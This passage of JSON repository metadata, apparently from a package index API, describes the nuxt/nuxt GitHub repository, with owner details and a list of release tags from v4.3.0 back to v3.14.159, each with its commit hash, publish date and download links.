Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":62,"last_synced_at":"2026-01-11T15:52:13.608Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":116453,"followers":4523,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-01-11T15:52:13.608Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G